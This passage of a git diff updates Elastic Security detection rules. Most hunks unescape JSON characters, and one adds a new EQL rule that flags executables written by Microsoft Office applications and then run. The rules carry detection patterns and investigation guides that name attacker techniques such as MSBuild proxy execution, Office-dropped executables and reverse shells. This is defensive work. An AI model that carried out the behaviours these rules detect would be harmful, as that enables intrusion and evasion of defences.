Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "source.ip:* or destination.ip:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -130,7 +130,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json index 1942c08b06a..41463b27269 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json index 2158e87be66..a76b05572eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_105.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json index 4bc62bbe290..fee7f2d7ea1 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_106.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json index 597a191e98e..d1d5ed5b34f 100644 --- a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_107.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json index 6f173dff110..7a806b1732d 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_101.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json index e858df7ae66..cfc79d0d0b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json index 95ce36733f2..8d0a3626fde 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json index 953c377edb0..2564230ea44 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json index 8b1d385daff..6de56631cc5 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json index 70aa32bd021..a3d41fb6c95 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json index 4c101ad64cf..075e5cc37a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_107.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json index 232c04119d9..0f1b9325f5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_104.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -87,7 +87,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json index d55fd519fca..13ab427e846 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_105.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json index a0daf781a17..52903f737a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_106.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -87,7 +87,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json index 76c30878592..6f875bc1370 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_107.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -97,7 +97,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108.json new file mode 100644 index 00000000000..199e26e7a4f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable created by a Microsoft Office application and subsequently executed. These processes are often launched via scripts inside documents or during exploitation of Microsoft Office applications.", + "from": "now-120m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of File Written or Modified by Microsoft Office", + "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by Microsoft Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. Attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\nThis rule searches for executable files written by MS Office applications executed in sequence. This is most likely the result of the execution of malicious documents or exploitation for initial access or privilege escalation. This rule can also detect suspicious processes masquerading as the MS Office applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=2h\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"WINWORD.EXE\" or\n process.name : \"EXCEL.EXE\" or\n process.name : \"OUTLOOK.EXE\" or\n process.name : \"POWERPNT.EXE\" or\n process.name : \"eqnedt32.exe\" or\n process.name : \"fltldr.exe\" or\n process.name : \"MSPUB.EXE\" or\n process.name : \"MSACCESS.EXE\")\n ] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\" and \n not (process.name : \"NewOutlookInstaller.exe\" and process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ] by host.id, process.executable\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json index a86baff0ba1..2a1f1885074 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_101.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json index 6ea4bf8c6f6..d1a52afe0cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json index d106acbf52f..e468576f059 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json index 16d79bb57d6..76c6ab1bac8 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0e5acaae-6a64-4bbc-adb8-27649c03f7e1_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json index 4aa9d7eefbf..f5da2387316 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_102.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json index 91e10b64c39..39e7cca9a79 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "MsBuild Making Network Connections", - "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host 